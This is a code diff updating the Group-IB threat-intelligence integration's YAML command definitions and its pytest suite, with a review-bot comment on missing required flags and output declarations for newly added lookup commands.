@@ -474,18 +298,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: a9a5b5cb9b971a2a037e3a0a30654185ea148095. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in osi/public_leak collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in osi/public_leak collection with provided ID. name: gibtia-get-osi-public-leak-info outputs: - contextPath: GIBTIA.PublicLeak.created @@ -525,19 +343,13 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: CVE-2021-27152. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in osi/vulnerability collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in osi/vulnerability collection with provided ID. name: gibtia-get-osi-vulnerability-info outputs: - contextPath: GIBTIA.OSIVulnerability.affectedSoftware.name 
@@ -580,138 +392,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- - GIB event id. - e.g.: 044f3f2cb599228c1882884eb77eb073f68a25f2. - isArray: false - name: id - required: false - secret: false - deprecated: false - description: Command performs Group IB event lookup in bp/phishing_kit and attacks/phishing_kit - collections with provided ID. - execution: false - name: gibtia-get-phishing-kit-info - outputs: - - contextPath: GIBTIA.PhishingKit.dateDetected - description: Phishing kit detection date. - type: Date - - contextPath: GIBTIA.PhishingKit.dateFirstSeen - description: Phishing kit first seen date. - type: Date - - contextPath: GIBTIA.PhishingKit.dateLastSeen - description: Phishing kit last seen date. - type: Date - - contextPath: GIBTIA.PhishingKit.downloadedFrom.fileName - description: Phishing kit filename. - type: String - - contextPath: GIBTIA.PhishingKit.downloadedFrom.domain - description: Phishing kit domain. - type: String - - contextPath: GIBTIA.PhishingKit.downloadedFrom.date - description: Downloading date. - type: Date - - contextPath: GIBTIA.PhishingKit.downloadedFrom.url - description: URL where phishing kit were downloaded from. - type: String - - contextPath: GIBTIA.PhishingKit.hash - description: MD5 phishing kit hash. - type: String - - contextPath: GIBTIA.PhishingKit.portalLink - description: Link to kit on GIB TI&A. - type: String - - contextPath: GIBTIA.PhishingKit.targetBrand - description: Phishing kit target brand. - type: String - - contextPath: GIBTIA.PhishingKit.emails - description: Emails found in phishing kit. - type: String - - contextPath: GIBTIA.PhishingKit.id - description: GIB event ID. - type: String - - contextPath: GIBTIA.PhishingKit.evaluation.severity - description: Event severity. - type: String - - arguments: - - default: false - description: |- - GIB event id. - e.g.: fce7f92d0b64946cf890842d083953649b259952. 
- isArray: false - name: id - required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in bp/phishing and attacks/phishing - collections with provided ID. - execution: false - name: gibtia-get-phishing-info - outputs: - - contextPath: GIBTIA.Phishing.dateDetected - description: Date of phishing detection. - type: Date - - contextPath: GIBTIA.Phishing.dateBlocked - description: Phishing resource block date. - type: Unknown - - contextPath: GIBTIA.Phishing.id - description: GIB incident ID. - type: String - - contextPath: GIBTIA.Phishing.ipv4.asn - description: Phishing resource ASN. - type: String - - contextPath: GIBTIA.Phishing.ipv4.countryName - description: Phishing resource country name. - type: String - - contextPath: GIBTIA.Phishing.ipv4.ip - description: Phishing resource IP address. - type: String - - contextPath: GIBTIA.Phishing.ipv4.region - description: Phishing resource region name. - type: String - - contextPath: GIBTIA.Phishing.phishingDomain.domain - description: Phishing domain. - type: String - - contextPath: GIBTIA.Phishing.phishingDomain.dateRegistered - description: Phishing domain creation date. - type: Date - - contextPath: GIBTIA.Phishing.phishingDomain.registrar - description: Phishing domain registrar name. - type: String - - contextPath: GIBTIA.Phishing.phishingDomain.title - description: Phishing domain title. - type: String - - contextPath: GIBTIA.Phishing.targetBrand - description: Phishing target name. - type: String - - contextPath: GIBTIA.Phishing.targetCategory - description: Phishing target category (financial, government, etc.) - type: String - - contextPath: GIBTIA.Phishing.targetDomain - description: Phishing target domain. - type: String - - contextPath: GIBTIA.Phishing.status - description: Current status of phishing incident (blocked, in response, etc.) - type: String - - contextPath: GIBTIA.Phishing.url - description: Phishing URL. 
- type: String - - contextPath: GIBTIA.Phishing.evaluation.severity - description: Event severity. - type: String - - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 26a05baa4025edff367b058b13c6b43e820538a5. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in attacks/ddos collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in attacks/ddos collection with provided ID. name: gibtia-get-attacks-ddos-info outputs: - contextPath: GIBTIA.AttacksDDoS.cnc.url @@ -766,18 +452,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 6009637a1135cd001ef46e21. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in attacks/deface collection - with provided ID. - execution: false + description: Command performs Group IB event lookup in attacks/deface collection with provided ID. name: gibtia-get-attacks-deface-info outputs: - contextPath: GIBTIA.AttacksDeface.date 
@@ -811,29 +491,19 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 1b09d389d016121afbffe481a14b30ea995876e4. - isArray: false name: id required: true - secret: false - - auto: PREDEFINED - default: false - defaultValue: 'false' - description: Is threat APT. - isArray: false - name: isAPT + - name: isAPT + auto: PREDEFINED predefined: - - 'true' - - 'false' - required: false - secret: false - deprecated: false - description: Command performs Group IB event lookup in hi/threat (or in apt/threat - if the APT flag is true) collection with provided ID. - execution: false + - "true" + - "false" + description: Is threat APT. + defaultValue: "false" + description: Command performs Group IB event lookup in hi/threat (or in apt/threat if the APT flag is true) collection with provided ID. name: gibtia-get-threat-info outputs: - contextPath: GIBTIA.Threat.contacts.account 
@@ -942,29 +612,19 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB internal threatActor ID. e.g.: 0d4496592ac3a0f5511cd62ef29887f48d9cb545. - isArray: false name: id required: true - secret: false - - auto: PREDEFINED - default: false - defaultValue: 'false' - description: Is threat actor APT group. - isArray: false - name: isAPT + - name: isAPT + auto: PREDEFINED predefined: - - 'true' - - 'false' - required: false - secret: false - deprecated: false - description: Command performs Group IB event lookup in hi/threat_actor (or in - apt/threat_actor if the APT flag is true) collection with provided ID. - execution: false + - "true" + - "false" + description: Is threat actor APT group. + defaultValue: "false" + description: Command performs Group IB event lookup in hi/threat_actor (or in apt/threat_actor if the APT flag is true) collection with provided ID. name: gibtia-get-threat-actor-info outputs: - contextPath: GIBTIA.ThreatActor.aliases @@ -1025,18 +685,12 @@ script: description: Sectors attacked by threat actor. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 109.70.100.46. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in suspicious_ip/tor_node - collection with provided ID. - execution: false + description: Command performs Group IB event lookup in suspicious_ip/tor_node collection with provided ID. name: gibtia-get-suspicious-ip-tor-node-info outputs: - contextPath: GIBTIA.SuspiciousIPTorNode.ipv4.asn 
@@ -1058,18 +712,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: cc6a2856da2806b03839f81aa214f22dbcfd7369. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in suspicious_ip/open_proxy - collection with provided ID. - execution: false + description: Command performs Group IB event lookup in suspicious_ip/open_proxy collection with provided ID. name: gibtia-get-suspicious-ip-open-proxy-info outputs: - contextPath: GIBTIA.SuspiciousIPOpenProxy.ipv4.asn @@ -1100,18 +748,12 @@ script: description: Event severity. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: 02e385600dfc5bf9b3b3656df8e0e20f5fc5c86e. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in suspicious_ip/socks_proxy - collection with provided ID. - execution: false + description: Command performs Group IB event lookup in suspicious_ip/socks_proxy collection with provided ID. name: gibtia-get-suspicious-ip-socks-proxy-info outputs: - contextPath: GIBTIA.SuspiciousIPSocksProxy.ipv4.asn 
@@ -1132,93 +774,20 @@ script: - contextPath: GIBTIA.SuspiciousIPSocksProxy.evaluation.severity description: Event severity. type: String - - arguments: - - default: false - description: |- - GIB event id. - e.g.: 5bbd38acf0b9e4f04123af494d485f6c49221e98. - isArray: false - name: id - required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in malware/targeted_malware - collection with provided ID. - execution: false - name: gibtia-get-malware-targeted-malware-info - outputs: - - contextPath: GIBTIA.TargetedMalware.date - description: Date malware detected. - type: Date - - contextPath: GIBTIA.TargetedMalware.fileName - description: Malware file name. - type: String - - contextPath: GIBTIA.TargetedMalware.fileType - description: Malware file type. - type: String - - contextPath: GIBTIA.TargetedMalware.id - description: GIB internal incident ID. - type: String - - contextPath: GIBTIA.TargetedMalware.injectDump - description: Inject dump. - type: String - - contextPath: GIBTIA.TargetedMalware.injectMd5 - description: MD5 hash of injection dump. - type: String - - contextPath: GIBTIA.TargetedMalware.malware.name - description: GIB internal malware ID. - type: String - - contextPath: GIBTIA.TargetedMalware.md5 - description: MD5 hash of malware file. - type: String - - contextPath: GIBTIA.TargetedMalware.sha1 - description: SHA1 hash of malware file. - type: String - - contextPath: GIBTIA.TargetedMalware.sha256 - description: SHA256 hash of malware file. - type: String - - contextPath: GIBTIA.TargetedMalware.size - description: Malware size in bytes. - type: Number - - contextPath: GIBTIA.TargetedMalware.source - description: Malware source. - type: String - - contextPath: GIBTIA.TargetedMalware.portalLink - description: GIB portal incident link. - type: String - - contextPath: GIBTIA.TargetedMalware.threatActor.name - description: Related threat actor. 
- type: String - - contextPath: GIBTIA.TargetedMalware.threatActor.id - description: GIB internal threat actor ID. - type: String - - contextPath: GIBTIA.TargetedMalware.threatActor.isAPT - description: Is threat actor APT. - type: Boolean - - contextPath: GIBTIA.TargetedMalware.evaluation.severity - description: Event severity. - type: String - - deprecated: false + - arguments: [] description: Returns list of available collections. - execution: false name: gibtia-get-available-collections outputs: - contextPath: GIBTIA.OtherInfo.collections description: List of availiable collections. type: String - arguments: - - default: false - description: |- + - description: |- GIB event id. e.g.: aeed277396e27e375d030a91533aa232444d0089. - isArray: false name: id required: true - secret: false - deprecated: false - description: Command performs Group IB event lookup in malware/cnc collection - by provided ID. - execution: false + description: Command performs Group IB event lookup in malware/cnc collection by provided ID. name: gibtia-get-malware-cnc-info outputs: - contextPath: GIBTIA.MalwareCNC.dateDetected @@ -1261,17 +830,12 @@ script: description: GIB event ID. type: String - arguments: - - default: false - description: |- + - description: |- Query you want to search. e.g.: 8.8.8.8. - isArray: false name: query required: true - secret: false - deprecated: false description: Command performs global Group IB search. - execution: false name: gibtia-global-search outputs: - contextPath: apiPath 
@@ -1284,59 +848,44 @@ script: description: Link to GIB TI&A interface. type: String - arguments: - - auto: PREDEFINED - default: false - description: Collection you want to search. - isArray: false + - description: |- + Collection you want to search. name: collection_name + required: true + auto: PREDEFINED predefined: - - compromised/account - - compromised/card + - compromised/account_group + - compromised/bank_card_group + - compromised/breached - compromised/mule - - compromised/imei + - osi/git_repository + - osi/public_leak + - osi/vulnerability - attacks/ddos - attacks/deface - - attacks/phishing + - attacks/phishing_group - attacks/phishing_kit - - bp/phishing - - bp/phishing_kit - - hi/threat - - hi/threat_actor - - apt/threat - - apt/threat_actor - - osi/git_leak - - osi/vulnerability - - osi/public_leak - suspicious_ip/tor_node - suspicious_ip/open_proxy - suspicious_ip/socks_proxy + - suspicious_ip/vpn + - suspicious_ip/scanner - malware/cnc - - malware/targeted_malware + - malware/malware + - hi/threat + - hi/threat_actor + - apt/threat_actor + - apt/threat + - name: query required: true - secret: false - - default: false description: |- Query you want to search. e.g.: 8.8.8.8. - isArray: false - name: query - required: true - secret: false - - default: false + - name: date_from description: Start date of search session. - isArray: false - name: date_from - required: false - secret: false - - default: false + - name: date_to description: End date of search session. - isArray: false - name: date_to - required: false - secret: false - deprecated: false description: Command performs Group IB search in selected collection. - execution: false name: gibtia-local-search outputs: - contextPath: id 
@@ -1345,7 +894,35 @@ script: - contextPath: additional_info description: Additional info about feed. type: String - dockerimage: demisto/python3:3.11.10.116949 + - arguments: + - description: 'GIB event id.e.g.: 192.168.0.1.' + name: id + description: Command performs Group IB event lookup in suspicious_ip/vpn collection by provided ID. + name: gibtia-get-suspicious-ip-vpn-info + - description: Command performs Group IB event lookup in suspicious_ip/scanner collection by provided ID. + name: gibtia-get-suspicious-ip-scanner-info + arguments: + - name: id + description: 'GIB event id.e.g.: 192.168.0.1.' + - arguments: + - description: 'GIB event id.e.g.: 653654fb986b47a31c73d92f4a20a273acd2f779.' + name: id + description: Command performs Group IB event lookup in malware/malware collection by provided ID. + name: gibtia-get-malware-malware-info + - arguments: + - description: |- + GIB event id. + name: id + required: true + description: Command performs Group IB event lookup in compromised/bank_card_group collection by provided ID. + name: gibtia-get-compromised-card-group-info + - arguments: + - description: GIB event id. + name: id + required: true + description: Command performs Group IB event lookup in attacks/phishing_group collection by provided ID. + name: gibtia-get-phishing-group-info + dockerimage: demisto/vendors-sdk:1.0.0.2073752 feed: false isfetch: true longRunning: false diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py index da3e608017f7..38558fd82581 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/GroupIBTIA_test.py 
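Review bot: The five commands added in this hunk are inconsistent with every other lookup command in the file: `gibtia-get-suspicious-ip-vpn-info`, `gibtia-get-suspicious-ip-scanner-info` and `gibtia-get-malware-malware-info` omit `required: true` on their `id` argument, and none of the five declares an `outputs:` section, so their context paths are undocumented and unavailable for playbook output mapping. The argument descriptions `'GIB event id.e.g.: 192.168.0.1.'` also lost the line break and space that the other commands keep (a `|-` block with `GIB event id.` / `e.g.: ...`). Adding `required: true` to the three `id` arguments and an `outputs:` list per command matching what the Python handlers return (the handlers are outside this hunk) would bring them in line. The `dockerimage` switch from `demisto/python3:3.11.10.116949` to `demisto/vendors-sdk:1.0.0.2073752` changes the runtime's dependency set and deserves a line in the release notes naming the SDK it pulls in.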
@@ -1,439 +1,203 @@ import pytest +from GroupIBTIA import ( + fetch_incidents_command, + Client, + main, + get_available_collections_command, +) +from urllib3.exceptions import InsecureRequestWarning +from urllib3 import disable_warnings as urllib3_disable_warnings +import GroupIBTIA from json import load -from GroupIBTIA import fetch_incidents_command, Client, transform_function, main, get_available_collections_command - -with open('test_data/example.json') as example: - RAW_JSON = load(example) -with open('test_data/results.json') as results: - RESULTS = load(results) - -# Because of errors with markdown tables -RESULTS.update({ - 'osi/git_repository': ( - ({'last_fetch': {'osi/git_repository': 1611862631144674}}, - [{'name': 'Git Leak: https://github.com/somegit', - 'occurred': '2021-01-28T22:32:54Z', - 'rawJSON': '{"company": [], "companyId": [3150], "contributors": ' - '[{"authorEmail": "some@email.com", "authorName": "somename"}, ' - '{"authorEmail": "some@email.com", "authorName": "somename"}, ' - '{"authorEmail": "some@email.com", "authorName": "somename"}], ' - '"dataFound": {"password": 8, "apikey": 2, "secret": 1}, ' - '"dateCreated": "2021-01-23T22:12:58+03:00", "dateDetected": ' - '"2021-01-28T22:32:54+03:00", "evaluation": {"admiraltyCode": ' - '"A1", "credibility": 50, "reliability": 50, "severity": ' - '"orange", "tlp": "amber", "ttl": 30}, "favouriteForCompanies": ' - '[], "files": "| URL | Author Email | Author Name | Date ' - 'Created| TimeStamp |\\n| ---- | --------------- | ' - '------------ | ----------- | ------------ |\\n| ' - 'https://github.com/somegit | some@email.com | TEST | ' - '1970-01-01T03:00:00+03:00 | [1611429178] |\\n", ' - '"hideForCompanies": [], "id": ' - '"21aed9b86d2e6cbb15180d803a84f6d27f673db4", ' - '"ignoreForCompanies": [], "isFavourite": false, "isHidden": ' - 'false, "isIgnore": false, "matchesTypes": [], "name": "Git ' - 'Leak: https://github.com/somegit", "numberOf": {"contributors": ' - '3, "files": 10}, 
"relations": {"infobip.com": "some.com", ' - '"Infobip": "some"}, "seqUpdate": 1611862631144674, "source": ' - '"github", "gibType": "osi/git_repository", ' - '"relatedIndicatorsData": [], "systemSeverity": 2}'}])), - 'osi/public_leak': ( - {'last_fetch': {'osi/public_leak': 1601909532153438}}, - [ - { - 'name': 'Public Leak: a9a5b5cb9b971a2a037e3a0a30654185ea148095', - 'occurred': '2020-10-05T17:51:31Z', - 'rawJSON': '{"bind": [], "created": "2020-10-05T17:51:31+03:00", "data": ' - '"Pasted at: 05/10/2020 15:45", "displayOptions": null, ' - '"evaluation": {"admiraltyCode": "C3", "credibility": 50, ' - '"reliability": 50, "severity": "orange", "tlp": "amber", "ttl": ' - '30}, "hash": "a9a5b5cb9b971a2a037e3a0a30654185ea148095", "id": ' - '"a9a5b5cb9b971a2a037e3a0a30654185ea148095", "language": "c", ' - '"linkList": "| Author | Date Detected | Date Published | Hash | Link | Source |\\n' - '| ------ | ------------- | -------------- | ---- |----- | ------ |\\n| whaaaaaat | ' - '2020-10-05T17:51:31+03:00 | 2020-10-05T17:45:46+03:00 | ' - '3066db9f57b7997607208fedc45d7203029d9cb3 | ' - '[https://some.ru](https://some.ru) | some.ru ' - '|\\n", "matches": "| Type | Sub Type | Value |\\n| ---- | -------- | ----- |\\n| email ' - '| email | some@gmail.ru |\\n", ' - '"oldId": null, ' - '"portalLink": "https://bt.group-ib.com/osi/public_leak?' 
- 'searchValue=id:a9a5b5cb9b971a2a037e3a0a30654186ea248094", ' - '"seqUpdate": 1601909532153438, "size": "345 B", "updated": ' - '"2020-10-05T17:51:31+03:00", "useful": 1, "name": ' - '"Public Leak: a9a5b5cb9b971a2a037e3a0a30654185ea148095", "gibType": ' - '"osi/public_leak", "relatedIndicatorsData": [], "systemSeverity": 2}' - } - ] - ), - 'bp/phishing_kit': ( - {'last_fetch': {'bp/phishing_kit': [1614921031175]}}, - [ - {'name': 'Phishing Kit: 8d7ea805fe20d6d77f57e2f0cadd17b1', - 'occurred': '2021-01-14T12:10:41Z', - 'rawJSON': '{"dateDetected": "2021-01-14T12:10:41+00:00", "dateFirstSeen": "2021-01-14T13:10:41+00:00", ' - '"dateLastSeen": "2021-01-14T14:12:17+00:00", "downloadedFrom": "| URL | File Name ' - '| Domain | Date |\\n| --- | --------- | ------ | ---- |\\n' - '| https://some.ru | show.zip | some.ru | 2021-01-21 10:10:41 |\\n' - '| https://some.ru | show.zip | "some.ru" ' - '| 2021-01-21 10:10:41 |\\n| https://some.ru | show.zip ' - '| some.ru | 2021-01-21 10:10:41 |\\n", ' - '"emails": [], "evaluation": {"admiraltyCode": "B2", "credibility": 70, ' - '"reliability": 80, "severity": "orange", "tlp": "amber", "ttl": ' - '30}, "hash": "8d7ea805fe20d6d77f57e2f0cadd17b1", "id": ' - '"044f3f2cb599228c1882884eb77eb073f68a25f2", "isFavourite": ' - 'false, "isHidden": false, "oldId": "396793696", "path": ' - '"https://tap.group-ib.com/api/api/v2/web/attacks/phishing_kit' - '/044f3f2cb599228c1882884eb77eb073f68a25f2/file' - '/95b61a1df152012abb79c3951ed98680e0bd917bbcf1d440e76b66a120292c76", ' - '"portalLink": "https://bt.group-ib.com/attacks/phishing_kit?searchValue=' - 'id:044f3f2cb599228c1882884eb77eb073f68a25f2", ' - '"seqUpdate": 1614921031175, "targetBrand": [], "tsFirstSeen": ' - 'null, "tsLastSeen": null, "variables": null, "name": ' - '"Phishing Kit: 8d7ea805fe20d6d77f57e2f0cadd17b1", "gibType": ' - '"bp/phishing_kit", "relatedIndicatorsData": [[]], ' - '"systemSeverity": 2}'}]), -}) -COLLECTION_NAMES = ['compromised/card', 'osi/git_repository', 
'osi/public_leak', - 'bp/phishing', 'bp/phishing_kit', 'malware/targeted_malware', "compromised/breached", - "compromised/account_group"] - - -@pytest.fixture(scope='function', params=COLLECTION_NAMES, ids=COLLECTION_NAMES) +import os + +realpath = os.path.join(os.path.dirname(os.path.realpath(__file__))) + +with open(f'{realpath}/test_data/main_collections_examples.json') as example: + COLLECTIONS_RAW_JSON = load(example) + +with open(f'{realpath}/test_data/search_example.json') as example: + SEARCH_RAW_JSON = load(example) + +with open(f'{realpath}/test_data/avalible_collections_example.json') as example: + AVALIBLE_COLLECTIONS_RAW_JSON = load(example) + +# Disable insecure warnings +urllib3_disable_warnings(InsecureRequestWarning) + + +COLLECTION_NAMES = [ + "compromised/account_group", + "compromised/bank_card_group", + "compromised/mule", + "osi/git_repository", + "osi/vulnerability", + "attacks/ddos", + "attacks/deface", + "attacks/phishing_group", + "attacks/phishing_kit", + "suspicious_ip/tor_node", + "suspicious_ip/open_proxy", + "suspicious_ip/socks_proxy", + "suspicious_ip/vpn", + "suspicious_ip/scanner", + "malware/cnc", + "hi/threat", + "hi/threat_actor", + "apt/threat", + "apt/threat_actor", + "malware/malware", + "osi/public_leak", + "compromised/breached" +] + +@pytest.fixture(scope="function", params=COLLECTION_NAMES) def session_fixture(request): """ - Given: - - A list of collection names from the integration - - When: - - Using each collection name as a parameter to the session_fixture - - Then: - - The fixture creates the expected client for each collection name - """ - return request.param, Client(base_url='https://some.ru') + Fixture for creating a client instance specific to each collection name. - -def test_transform_function_on_dict(): - """ Given: - - A dictionary input to transform + - A list of predefined collection names that represent different types of data. 
When: - - Calling transform_function() on the input + - Each test function requests an instance of this fixture. Then: - - The nested dict is flattened as expected + - Returns a tuple with the current collection name and an instantiated Client object. + - The Client instance is configured to interact with the appropriate collection by connecting + to the integration's base URL, using authentication, and including necessary headers. """ - test_input = {'a': 1, 'b': {'c': 2}} - expected = {'a': 1, 'b c': 2} - actual, _ = transform_function(test_input) - assert actual == expected + return request.param, Client( + base_url="https://some-url.com", + auth=("example@example.com", "exampleAPI_TOKEN"), + verify=True, + headers={"Accept": "*/*"}, + ) -def test_transform_function_on_list(): +@pytest.fixture(scope="function") +def single_session_fixture(): """ - Given: - - A list input to transform - - When: - - Calling transform_function() on the input - - Then: - - The nested list is flattened as expected - """ - test_input = [{'a': 1}, {'b': 2}] - # expected = {} - actual, _ = transform_function(test_input) - assert actual == {} + Fixture for creating a generic client instance to be used across multiple tests. - -def test_transform_function_on_primitive(): - """ Given: - - A primitive input to transform + - No specific parameters; only a need for a Client object with common configuration. When: - - Calling transform_function() on the input + - A test requires a general Client instance without needing to specify a collection. Then: - - The nested primitive is flattened as expected + - Returns a Client instance configured with the base URL, authentication, and headers. + - The instance can be reused by any test that doesn't depend on a specific collection name. 
""" - test_input = 'test' - expected = {'': 'test'} - actual, _ = transform_function(test_input) - assert actual == expected + return Client( + base_url="https://some-url.com", + auth=("example@example.com", "exampleAPI_TOKEN"), + verify=True, + headers={"Accept": "*/*"}, + ) -def test_transform_function_returns_tuple(): +def test_fetch_incidents(mocker, session_fixture): """ + Test for verifying the behavior of the fetch_incidents_command function. + Given: - - A tuple input to transform + - session_fixture, which provides a client instance associated with a specific collection name. + - last_run, a dictionary representing the previous state of incident fetching. + - first_fetch_time, a string specifying the starting time frame for incident retrieval. When: - - Calling transform_function() on the input + - fetch_incidents_command() is invoked with the above parameters. Then: - - The nested tuple is flattened as expected + - Ensures that the command returns the correct types for next_run and incidents. + - Verifies that incidents is a list, as expected. + - This test validates that the command correctly retrieves incidents for each collection + and that the returned data structure matches the expected format. """ - test_input = {'a': 1} - actual = transform_function(test_input) - assert isinstance(actual, tuple) - assert len(actual) == 2 + collection_name, client = session_fixture + collection_name, client = session_fixture + mocker.patch.object(client, 'create_poll_generator', return_value=[COLLECTIONS_RAW_JSON[collection_name]]) + next_run, incidents = fetch_incidents_command( + client=client, + last_run={}, + first_fetch_time="3 days", + incident_collections=[], + max_requests=3, + hunting_rules=False + ) + assert isinstance(incidents, list) -def test_fetch_incidents(mocker, session_fixture): +def test_main_error(): """ + Test for verifying the error-handling behavior in the main() function. 
+ Given: - - Mocked API responses for fetch_incidents - - last_run dict, first_fetch_time str, etc. + - A main() function configured to raise an exception when calling error_command. When: - - Calling fetch_incidents_command() + - The main function invokes error_command(), which is expected to trigger an error. Then: - - next_run and incidents have expected types - - Number of incidents matches mock response + - Ensures that a SystemExit exception is raised as expected. + - The test checks that the main function handles errors in a predictable and controlled + manner, allowing graceful exits during failure. """ - collection_name, client = session_fixture - mocker.patch.object(client, 'create_poll_generator', return_value=[RAW_JSON[collection_name]]) - next_run, incidents = fetch_incidents_command(client=client, - last_run={}, - first_fetch_time="3 days", - incident_collections=[], - requests_count=3) - assert isinstance(incidents, list) + with pytest.raises(SystemExit): + main()["error_command"]() # type: ignore -def test_main_error(): +def test_global_search_command(mocker, single_session_fixture): """ + Test for verifying the functionality of the global_search_command function. + Given: - - main() setup to raise an exception + - single_session_fixture provides a client instance for performing a search. + - A test_query dictionary with a "query" key specifying a search term, in this case, an IP address. When: - - Calling the error_command() via main() + - The global_search_command() function is called with the client and test_query arguments. 
Then: - - An exception is raised as expected - """ - with pytest.raises(Exception): - main()["error_command"]() - - -def test_global_search_command(mocker, session_fixture): - import GroupIBTIA - test_response = [{ - "apiPath": "suspicious_ip/open_proxy", - "label": "Suspicious IP :: Open Proxy", - "link": "", - "count": 14, - "time": 0.299055199, - "detailedLinks": None, - }] - - collection_name, client = session_fixture - mocker.patch.object(Client, '_http_request', return_value=test_response) - mocker.patch.object(GroupIBTIA, 'find_element_by_key', return_value=test_response) - test_query = {'query': 'test'} + - Ensures that the command’s outputs_prefix and outputs_key_field are correctly set to expected values. + - Verifies that the command returns the data structure with the correct outputs_key_field ("query"), + ensuring compatibility with other functions that depend on this structure. + - This test validates that the search command integrates smoothly with the client and returns + consistent output formatting. + """ + client = single_session_fixture + mocker.patch.object(client, 'search_proxy_function', return_value=SEARCH_RAW_JSON) + test_query = {"query": "8.8.8.8"} result = GroupIBTIA.global_search_command(client=client, args=test_query) assert result.outputs_prefix == "GIBTIA.search.global" assert result.outputs_key_field == "query" -def test_get_available_collections(mocker, session_fixture): +def test_get_available_collections(mocker, single_session_fixture): """ + Test for validating the get_available_collections_command function. + Given: - - Mock client with a mocked get_available_collections method + - single_session_fixture, which provides a client instance for retrieving available collections. When: - - Calling get_available_collections_command() + - The get_available_collections_command() function is invoked with the client instance. 
Then: - - Outputs prefix and key field are as expected - - Result outputs is a list - """ - import GroupIBTIA - collection_name, client = session_fixture - mocker.patch.object(Client, '_http_request', return_value=RAW_JSON) - mocker.patch.object(GroupIBTIA, 'find_element_by_key', return_value=RAW_JSON[collection_name]) - + - Verifies that the outputs_prefix is correctly set to "GIBTIA.OtherInfo", indicating that + the response data is categorized as general information. + - Checks that the outputs_key_field is "collections", matching the expected key for collections data. + - Ensures that the "collections" field in the output contains a list of collection names, as expected. + - This test confirms that the command accurately retrieves and formats the list of available + collections from the server response. + """ + client = single_session_fixture + mocker.patch.object(client, 'get_available_collections_proxy_function', return_value=[AVALIBLE_COLLECTIONS_RAW_JSON]) result = get_available_collections_command(client=client) assert result.outputs_prefix == "GIBTIA.OtherInfo" assert result.outputs_key_field == "collections" - assert isinstance(result.outputs['collections'], list) - - -def test_find_element_by_key_nested_dict(): - """ - Given: - - A nested input dict - - When: - - Calling find_element_by_key() with a nested key - - Then: - - The expected nested value is returned - """ - from GroupIBTIA import find_element_by_key - test_dict = {'a': {'b': 'value'}} - result = find_element_by_key(test_dict, 'a.b') - assert result == 'value' - - -def test_find_element_by_key_list(): - """ - Given: - - A list input - - When: - - Calling find_element_by_key() to get all values of a key - - Then: - - A list containing all values is returned - """ - from GroupIBTIA import find_element_by_key - test_list = [{'a': 'value1'}, {'a': 'value2'}] - result = find_element_by_key(test_list, 'a') - assert len(result) == 2 - assert 'value1' in result - assert 'value2' in result - - -def 
test_find_element_by_key_missing(): - """ - Given: - - An input dict without the specified key - - When: - - Calling find_element_by_key() with a missing key - - Then: - - None is returned as expected - """ - from GroupIBTIA import find_element_by_key - test_dict = {'a': 1} - result = find_element_by_key(test_dict, 'b') - assert result is None - - -def test_transform_some_fields_into_markdown(): - from GroupIBTIA import transform_some_fields_into_markdown - - collection_name = "osi/git_repository" - feed = { - "files": [ - { - "url": "https://example.com", - "dateCreated": "2023-10-16", - "revisions": { - "info": { - "authorEmail": "author@example.com", - "authorName": "John Doe", - "timestamp": 1234567890 - } - } - }, - # ... - ] - } - - expected_output = { - "files": "| URL | Author Email | Author Name | Date Created| TimeStamp |\n" - "| ---- | --------------- | ------------ | ----------- | ------------ |\n" - "| https://example.com | author@example.com | John Doe | 2023-10-16 | 1234567890 |\n" - } - - result = transform_some_fields_into_markdown(collection_name, feed) - - assert result == expected_output - - -def test_transform_some_fields_into_markdown_phishing_kit(): - from GroupIBTIA import transform_some_fields_into_markdown - - collection_name = "bp/phishing_kit" - feed = { - "downloadedFrom": [ - { - "date": "2023-10-16", - "url": "https://example.com", - "domain": "example.com", - "fileName": "phish.zip" - }, - # ... 
